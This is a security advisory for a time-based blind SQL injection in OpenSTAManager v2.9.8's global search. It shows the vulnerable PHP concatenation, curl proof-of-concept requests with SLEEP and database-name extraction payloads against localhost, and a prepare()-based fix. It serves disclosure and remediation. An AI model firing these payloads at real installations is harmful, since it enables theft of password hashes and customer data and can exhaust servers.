GHSA-4hc4-8599-xh2h

Опубликовано: 06 фев. 2026

Источник: github

Github: Прошло ревью

CVSS4: 8.7

Описание

OpenSTAManager has a Time-Based Blind SQL Injection with Amplified Denial of Service

Summary

Critical Time-Based Blind SQL Injection vulnerability affecting multiple search modules in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attacks with amplified execution across 10+ modules.

Status: ✅ Confirmed and tested on live instance (v2.9.8) Vulnerable Parameter: term (GET) Affected Endpoint: /ajax_search.php Affected Modules: Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi

Details

OpenSTAManager v2.9.8 contains a critical Time-Based Blind SQL Injection vulnerability in the global search functionality. The application fails to properly sanitize the term parameter before using it in SQL LIKE clauses across multiple module-specific search handlers, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.

Vulnerability Chain:

Entry Point: /ajax_search.php (Line 30-31)

$term = get('term'); $term = str_replace('/', '\\/', $term);

The $term parameter undergoes minimal sanitization (only forward slash replacement).
Distribution: /src/AJAX.php::search() (Line 159-161)

$files = self::find('ajax/search.php'); array_unshift($files, base_dir().'/ajax_search.php'); foreach ($files as $file) { $module_results = self::getSearchResults($file, $term);

The unsanitized $term is passed to all module-specific search handlers.
Execution: /src/AJAX.php::getSearchResults() (Line 373)

require $file;

Each module's search.php file is included with $term variable in scope.
Vulnerable SQL Queries: Multiple modules directly concatenate $term without prepare()

All Affected Files (10+ vulnerable instances):

/modules/articoli/ajax/search.php - Line 51 (PRIMARY EXAMPLE)

foreach ($fields as $name => $value) { $query .= ' OR '.$value.' LIKE "%'.$term.'%"'; } $rs = $dbo->fetchArray($query);

Impact: Direct concatenation without prepare(), allows full SQL injection.
/modules/ordini/ajax/search.php - Line 43, 47

$query .= ' OR '.$value.' LIKE "%'.$term.'%"'; $query .= '... WHERE `mg_articoli`.`codice` LIKE "%'.$term.'%" OR `mg_articoli_lang`.`title` LIKE "%'.$term.'%"';
/modules/ddt/ajax/search.php - Line 43, 47

$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
/modules/fatture/ajax/search.php - Line 45, 49

$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
/modules/preventivi/ajax/search.php - Line 45, 49

$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
/modules/anagrafiche/ajax/search.php - Line 62, 107, 162

$query .= ' OR '.$value.' LIKE "%'.$term.'%"';
/modules/impianti/ajax/search.php - Line 46

$query .= ' OR '.$value.' LIKE "%'.$term.'%"';

Properly Sanitized (NOT vulnerable):

/modules/contratti/ajax/search.php - Uses prepare() correctly
/modules/automezzi/ajax/search.php - Uses prepare() correctly

Note: The vulnerability has amplified execution - a single malicious request triggers SQL Injection across ALL vulnerable modules simultaneously, causing time-based attacks to execute 10+ times per request, multiplying the delay and leading to 504 Gateway Time-out errors as observed on the live demo instance.

PoC

Step 1: Login

curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \ -d 'username=admin&password=admin'

Step 2: Verify Vulnerability (Time-Based SLEEP)

# Test with SLEEP(1) - should take ~85+ seconds due to amplified execution time curl -s -b /tmp/cookies.txt \ 'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22' # Result: real 72.29s # Test with SLEEP(0) - should be fast time curl -s -b /tmp/cookies.txt \ 'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(0)%20OR%20%22' # Result: real 0.30s

Step 3: Data Extraction - Database Name

# Extract first character of database name (expected: 'o' from 'openstamanager') time curl -s -b /tmp/cookies.txt \ "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \ > /dev/null # Result: real 170.32s # Test with wrong character 'x' - should be fast time curl -s -b /tmp/cookies.txt \ "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \ > /dev/null # Result: real 0m0.30s

Impact

Affected Users: All authenticated users with access to the global search functionality.

Complete database exfiltration including customer PII, financial records, business secrets
Extraction of password hashes for offline cracking
Amplified time-based attacks consume 85x server resources per request

Recommended Fix:

Replace all instances of direct $term concatenation with prepare():

BEFORE (Vulnerable):

$query .= ' OR '.$value.' LIKE "%'.$term.'%"';

AFTER (Fixed):

$query .= ' OR '.$value.' LIKE '.prepare('%'.$term.'%');

Apply this fix to ALL affected files:

/modules/articoli/ajax/search.php - Line 51
/modules/ordini/ajax/search.php - Lines 43, 47, 79
/modules/ddt/ajax/search.php - Lines 43, 47, 83
/modules/fatture/ajax/search.php - Lines 45, 49, 85
/modules/preventivi/ajax/search.php - Lines 45, 49, 83
/modules/anagrafiche/ajax/search.php - Lines 62, 107, 162
/modules/impianti/ajax/search.php - Line 46

Ссылки

https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4hc4-8599-xh2h

Пакеты

Наименование

devcode-it/openstamanager

composer

Затронутые версииВерсия исправления

Отсутствует

8.7 High

CVSS4

CVE ID

CVE-2026-24417